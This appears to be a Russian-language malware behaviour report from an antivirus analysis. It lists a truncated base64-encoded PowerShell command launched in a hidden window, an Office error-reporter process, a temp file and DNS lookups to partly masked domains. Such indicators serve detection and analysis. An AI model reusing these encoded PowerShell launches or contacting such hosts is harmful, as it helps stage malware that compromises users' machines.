Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
- %TEMP%\1347630.cvr
- DNS ASK na####nebolango.com
- DNS ASK an##op.xyz
- DNS ASK wo############591-66491-179337.cloudwaysapps.com
- DNS ASK we#####osspalace.com
- DNS ASK re###wtral.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (со скрытым окном)